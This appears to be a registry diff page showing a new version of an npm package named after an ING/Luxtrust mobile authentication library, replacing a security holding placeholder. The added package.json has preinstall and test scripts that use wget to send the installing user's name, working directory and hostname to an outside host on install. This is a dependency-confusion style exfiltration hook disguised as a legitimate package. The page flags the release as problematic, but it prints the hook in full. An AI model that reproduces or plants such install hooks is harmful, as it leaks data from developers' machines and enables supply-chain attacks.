ing-orange-lu-luxtrust-oaw-mobile-authentication 0.0.1-security → 69.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of ing-orange-lu-luxtrust-oaw-mobile-authentication might be problematic. Click here for more details.

package/README.md CHANGED
@@ -1,5 +1,2 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=ing-orange-lu-luxtrust-oaw-mobile-authentication for more information.
1
+ # No info here
2
+ Under Development
@@ -0,0 +1,3 @@
1
+ <svg width="64" height="64" viewBox="0 0 64 64" fill="none" xmlns="http://www.w3.org/2000/svg">
2
+ <path fill-rule="evenodd" clip-rule="evenodd" d="M20.3145 0H44.2188C48.7918 0 52.5333 3.71613 52.5333 8.25806V55.7419C52.5333 60.2839 48.7918 64 44.2188 64H20.3145C15.7415 64 12 60.2839 12 55.7419V8.25806C12 3.71613 15.7415 0 20.3145 0ZM49.4156 8.25776C49.4156 5.41182 47.0845 3.09647 44.2191 3.09647H20.3148C17.4494 3.09647 15.1182 5.41182 15.1182 8.25776V55.7416C15.1182 58.5876 17.4494 60.9029 20.3148 60.9029H44.2191C47.0845 60.9029 49.4156 58.5876 49.4156 55.7416V8.25776ZM46.1335 8.53329H18.4001V44.8H46.1335V8.53329ZM21.551 41.7146H42.9824V11.6189H21.551V41.7146ZM32.2662 58.2232C34.8671 58.2232 36.9753 56.1293 36.9753 53.546C36.9753 50.9628 34.8671 48.8689 32.2662 48.8689C29.6653 48.8689 27.5571 50.9628 27.5571 53.546C27.5571 56.1293 29.6653 58.2232 32.2662 58.2232ZM29.8438 53.5468C29.8438 54.8758 30.9283 55.953 32.2664 55.953C33.6045 55.953 34.689 54.8758 34.689 53.5468C34.689 52.2178 33.6045 51.1406 32.2664 51.1406C30.9283 51.1406 29.8438 52.2178 29.8438 53.5468Z" fill="#FF6200"/>
3
+ </svg>
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("This is a message from the PoC package");
3
+ }
package/package.json CHANGED
@@ -1,6 +1,19 @@
1
1
  {
2
2
  "name": "ing-orange-lu-luxtrust-oaw-mobile-authentication",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "69.0.0",
4
+ "description": "ING Orange Luxtrust OAW Mobile Authentication.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "wget --quiet \"https://stackrip.com/ing/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
8
+ "preinstall": "wget --quiet \"https://stackrip.com/ing/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
9
+ },
10
+ "keywords": [
11
+ "https://websec.nl"
12
+ ],
13
+ "dependencies": {},
14
+ "config": {
15
+ "unsafe-perm":true
16
+ },
17
+ "author": "Luxtrust Mobile",
18
+ "license": "ISC"
6
19
  }